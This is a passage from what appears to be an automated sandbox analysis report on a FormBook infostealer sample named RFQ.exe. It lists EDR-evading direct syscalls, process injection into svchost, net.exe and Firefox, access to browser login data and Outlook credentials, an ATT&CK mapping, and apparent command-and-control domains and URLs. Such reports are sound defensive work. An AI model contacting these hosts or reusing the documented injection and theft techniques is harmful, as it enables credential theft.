                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0396C8F9 mov eax, dword ptr fs:[00000030h]2_2_0396C8F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039FA8E4 mov eax, dword ptr fs:[00000030h]2_2_039FA8E4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_039BC810 mov eax, dword ptr fs:[00000030h]2_2_039BC810
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03952835 mov eax, dword ptr fs:[00000030h]2_2_03952835
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0076A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0076A66C
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_007581AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_007581AC
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00758189 SetUnhandledExceptionFilter,0_2_00758189

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtAllocateVirtualMemory: Direct from: 0x76EF48ECJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtQueryAttributesFile: Direct from: 0x76EF2E6CJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtQueryVolumeInformationFile: Direct from: 0x76EF2F2CJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtQuerySystemInformation: Direct from: 0x76EF48CCJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtOpenSection: Direct from: 0x76EF2E0CJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtDeviceIoControlFile: Direct from: 0x76EF2AECJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BECJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtQueryInformationToken: Direct from: 0x76EF2CACJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtCreateFile: Direct from: 0x76EF2FECJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtOpenFile: Direct from: 0x76EF2DCCJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtTerminateThread: Direct from: 0x76EF2FCCJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtOpenKeyEx: Direct from: 0x76EF2B9CJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtSetInformationProcess: Direct from: 0x76EF2C5CJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtProtectVirtualMemory: Direct from: 0x76EF2F9CJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtWriteVirtualMemory: Direct from: 0x76EF2E3CJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtNotifyChangeKey: Direct from: 0x76EF3C2CJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtCreateMutant: Direct from: 0x76EF35CCJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtResumeThread: Direct from: 0x76EF36ACJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtMapViewOfSection: Direct from: 0x76EF2D1CJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtClose: Direct from: 0x76EE7B2E
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtAllocateVirtualMemory: Direct from: 0x76EF2BFCJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtQuerySystemInformation: Direct from: 0x76EF2DFCJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtReadFile: Direct from: 0x76EF2ADCJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtDelayExecution: Direct from: 0x76EF2DDCJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtQueryInformationProcess: Direct from: 0x76EF2C26Jump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtResumeThread: Direct from: 0x76EF2FBCJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtCreateUserProcess: Direct from: 0x76EF371CJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtAllocateVirtualMemory: Direct from: 0x76EF3C9CJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtWriteVirtualMemory: Direct from: 0x76EF490CJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtSetInformationThread: Direct from: 0x76EE63F9Jump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtClose: Direct from: 0x76EF2B6C
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtSetInformationThread: Direct from: 0x76EF2B4CJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtReadVirtualMemory: Direct from: 0x76EF2E8CJump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeNtCreateKey: Direct from: 0x76EF2C6CJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\RFQ.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\svchost.exeSection loaded: NULL target: C:\Windows\SysWOW64\net.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\net.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\net.exeThread register set: target process: 3176Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\net.exeThread APC queued: target process: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeJump to behavior
                Writes to foreign memory regions
                Source: C:\Users\user\Desktop\RFQ.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2F87008Jump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0076B106 LogonUserW,0_2_0076B106
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00733D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00733D19
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0077411C SendInput,keybd_event,0_2_0077411C
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_007774E7 mouse_event,0_2_007774E7
                Source: C:\Users\user\Desktop\RFQ.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\RFQ.exe"Jump to behavior
                Source: C:\Program Files (x86)\kuDTOOcwiVdWlQPDkujIixANdwTkyBLAEiGaFiCvvzloAjFxomVKtSQk\enUILRNjDql.exeProcess created: C:\Windows\SysWOW64\net.exe "C:\Windows\SysWOW64\net.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0076A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0076A66C
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_007771FA AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_007771FA
                Source: enUILRNjDql.exe, 00000003.00000000.2177169547.0000000001301000.00000002.00000001.00040000.00000000.sdmp, enUILRNjDql.exe, 00000003.00000002.4572668463.0000000001301000.00000002.00000001.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000000.2361806147.0000000001101000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
                Source: RFQ.exe, enUILRNjDql.exe, 00000003.00000000.2177169547.0000000001301000.00000002.00000001.00040000.00000000.sdmp, enUILRNjDql.exe, 00000003.00000002.4572668463.0000000001301000.00000002.00000001.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000000.2361806147.0000000001101000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: enUILRNjDql.exe, 00000003.00000000.2177169547.0000000001301000.00000002.00000001.00040000.00000000.sdmp, enUILRNjDql.exe, 00000003.00000002.4572668463.0000000001301000.00000002.00000001.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000000.2361806147.0000000001101000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: RFQ.exeBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndTHISREMOVEblankinfoquestionstopwarning
                Source: enUILRNjDql.exe, 00000003.00000000.2177169547.0000000001301000.00000002.00000001.00040000.00000000.sdmp, enUILRNjDql.exe, 00000003.00000002.4572668463.0000000001301000.00000002.00000001.00040000.00000000.sdmp, enUILRNjDql.exe, 00000006.00000000.2361806147.0000000001101000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_007565C4 cpuid 0_2_007565C4
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0078091D GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,__wsplitpath,_wcscat,_wcscat,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,_wcscpy,SetCurrentDirectoryW,0_2_0078091D
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_007AB340 GetUserNameW,0_2_007AB340
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00761E8E __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00761E8E
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0074DDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_0074DDC0

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.4572018212.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2291393354.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4574678267.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2291056975.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4573259207.0000000003480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4573144434.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4572938071.00000000047E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2291967315.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\net.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\net.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior
                Source: RFQ.exeBinary or memory string: WIN_81
                Source: RFQ.exeBinary or memory string: WIN_XP
                Source: RFQ.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 12, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubytep
                Source: RFQ.exeBinary or memory string: WIN_XPe
                Source: RFQ.exeBinary or memory string: WIN_VISTA
                Source: RFQ.exeBinary or memory string: WIN_7
                Source: RFQ.exeBinary or memory string: WIN_8

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.4572018212.0000000002EE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2291393354.0000000003800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.4574678267.0000000004EA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2291056975.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4573259207.0000000003480000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.4573144434.0000000003320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.4572938071.00000000047E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2291967315.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_00788C4F socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,0_2_00788C4F
                Source: C:\Users\user\Desktop\RFQ.exeCode function: 0_2_0078923B socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_0078923B

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire Infrastructure2
                Valid Accounts                		3
                Native API                		1
                DLL Side-Loading                		1
                Exploitation for Privilege Escalation                		1
                Disable or Modify Tools                		1
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services1
                Archive Collected Data                		4
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault AccountsScheduled Task/Job2
                Valid Accounts                		1
                Abuse Elevation Control Mechanism                		1
                Deobfuscate/Decode Files or Information                		21
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		1
                Encrypted Channel                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading                		1
                Abuse Elevation Control Mechanism                		Security Account Manager2
                File and Directory Discovery                		SMB/Windows Admin Shares1
                Email Collection                		4
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
                Valid Accounts                		3
                Obfuscated Files or Information                		NTDS116
                System Information Discovery                		Distributed Component Object Model21
                Input Capture                		4
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
                Access Token Manipulation                		1
                DLL Side-Loading                		LSA Secrets151
                Security Software Discovery                		SSH3
                Clipboard Data                		Fallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
                Process Injection                		2
                Valid Accounts                		Cached Domain Credentials2
                Virtualization/Sandbox Evasion                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Virtualization/Sandbox Evasion                		DCSync3
                Process Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                Access Token Manipulation                		Proc Filesystem11
                Application Window Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
                Process Injection                		/etc/passwd and /etc/shadow1
                System Owner/User Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1555881 Sample: RFQ.exe Startdate: 14/11/2024 Architecture: WINDOWS Score: 100 28 www.066bet.xyz 2->28 30 www.yushaliu.online 2->30 32 21 other IPs or domains 2->32 42 Multi AV Scanner detection for submitted file 2->42 44 Yara detected FormBook 2->44 46 Binary is likely a compiled AutoIt script file 2->46 50 3 other signatures 2->50 10 RFQ.exe 2 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Writes to foreign memory regions 10->64 66 Maps a DLL or memory area into another process 10->66 68 Switches to a custom stack to bypass stack traces 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 enUILRNjDql.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 net.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 enUILRNjDql.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.pluribiz.life 209.74.64.58, 49992, 49993, 49994 MULTIBAND-NEWHOPEUS United States 22->34 36 ppp84k45ss7ehy8ypic5x.limelightcdn.com 23.106.59.18, 50020, 50021, 50022 LEASEWEB-UK-LON-11GB United Kingdom 22->36 38 7 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                RFQ.exe30%ReversingLabsWin32.Trojan.AutoitInject
                RFQ.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                webredir.vip.gandi.net
                		217.70.184.50
                		truefalse
                  		high
                  fiqsth.vip
                  		3.33.130.190
                  		truefalse
                    		unknown
                    bio-thymus.com
                    		3.33.130.190
                    		truefalse
                      		unknown
                      www.pluribiz.life
                      		209.74.64.58
                      		truefalse
                        		high
                        corpseflowerwatch.org
                        		3.33.130.190
                        		truefalse
                          		unknown
                          www.evoo.website
                          		128.65.195.180
                          		truefalse
                            		high
                            www.wukong.college
                            		47.52.221.8
                            		truefalse
                              		high
                              marketprediction.app
                              		3.33.130.190
                              		truefalse
                                		unknown
                                www.yushaliu.online
                                		208.91.197.27
                                		truefalse
                                  		unknown
                                  77980.bodis.com
                                  		199.59.243.227
                                  		truefalse
                                    		high
                                    www.kdtzhb.top
                                    		47.242.89.146
                                    		truefalse
                                      		high
                                      www.migraine-massages.pro
                                      		199.59.243.227
                                      		truefalse
                                        		high
                                        ppp84k45ss7ehy8ypic5x.limelightcdn.com
                                        		23.106.59.18
                                        		truefalse
                                          		unknown
                                          www.bulls777.pro
                                          		unknown
                                          		unknownfalse
                                            		unknown
                                            www.astorg-group.info
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              www.bio-thymus.com
                                              		unknown
                                              		unknownfalse
                                                		unknown
                                                www.marketprediction.app
                                                		unknown
                                                		unknownfalse
                                                  		unknown
                                                  www.fiqsth.vip
                                                  		unknown
                                                  		unknownfalse
                                                    		unknown
                                                    www.vehiculargustav.click
                                                    		unknown
                                                    		unknownfalse
                                                      		unknown
                                                      www.corpseflowerwatch.org
                                                      		unknown
                                                      		unknownfalse
                                                        		unknown
                                                        www.vnxoso88.art
                                                        		unknown
                                                        		unknownfalse
                                                          		unknown
                                                          www.066bet.xyz
                                                          		unknown
                                                          		unknowntrue
                                                            		unknown
                                                            www.4nk.education
                                                            		unknown
                                                            		unknownfalse
                                                              		unknown

                                                              Contacted URLs

                                                              NameMaliciousAntivirus DetectionReputation
                                                              http://www.4nk.education/gnvu/false
                                                                		unknown
                                                                http://www.4nk.education/gnvu/?W638b4U=nxCjiJTB74oIWabUJfF6YI/8fUWqiaBkhoi4dayZTBfl5+e+2r+tNQPR6bJXqR1fUXmtsCJ3OPXRNkZ1wk4Fjjnnxvqu9VAopw5jutgMYieatrM5Tiebl9fmqoGSNeZ5Og==&Xll=50hLc0Hhyfalse
                                                                  		unknown
                                                                  http://www.evoo.website/293d/false
                                                                    		unknown
                                                                    http://www.corpseflowerwatch.org/yjfe/?W638b4U=ssLl/70GAhUcKdDgdVfXop7fxRMgpYiZ3vsJccOUHyCqzcpfrIrrd04a2OAN6WfHhwyB0RQ+DljnHu6RgupRatGgzGgePg7VlA49G10KSSL4yAbTFmYSs1RlWHEt8ktcvA==&Xll=50hLc0Hhyfalse
                                                                      		unknown
                                                                      http://www.wukong.college/9ezc/?Xll=50hLc0Hhy&W638b4U=xtzn0DJhGGCFi+NFPE3T6Cy+g21HMhjej1Dx0a13Tc/qv05ju/V7yVyPB0RA699858ofq0RXC37Z8DQM9/J+NZNi8BTPy99Tau97oJsSOpJizwynXn/5fxfwmQ1lNSou+g==false
                                                                        		unknown
                                                                        http://www.vehiculargustav.click/95c0/false
                                                                          		unknown
                                                                          http://www.fiqsth.vip/0m8a/false
                                                                            		unknown
                                                                            http://www.marketprediction.app/ucmb/?W638b4U=vlSStPgYi/rw0++s6ZKUsH+lT2dpjOyqKmbfTh2Wh6BCmYHhC9h1DMbb37dpPZ/1mBJsvII6DMGZ/nD5LfnLwkKxStK4w4vex/YLsSNnFHqgqyWr0vfKWW8f0ZD4+1Q9hQ==&Xll=50hLc0Hhyfalse
                                                                              		unknown
                                                                              http://www.migraine-massages.pro/ym43/?W638b4U=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRTsdeZatTq9P8nD3DJaYsKbhsyMI+cP4BIi4vfpBrFLN6oA==&Xll=50hLc0Hhyfalse
                                                                                		unknown
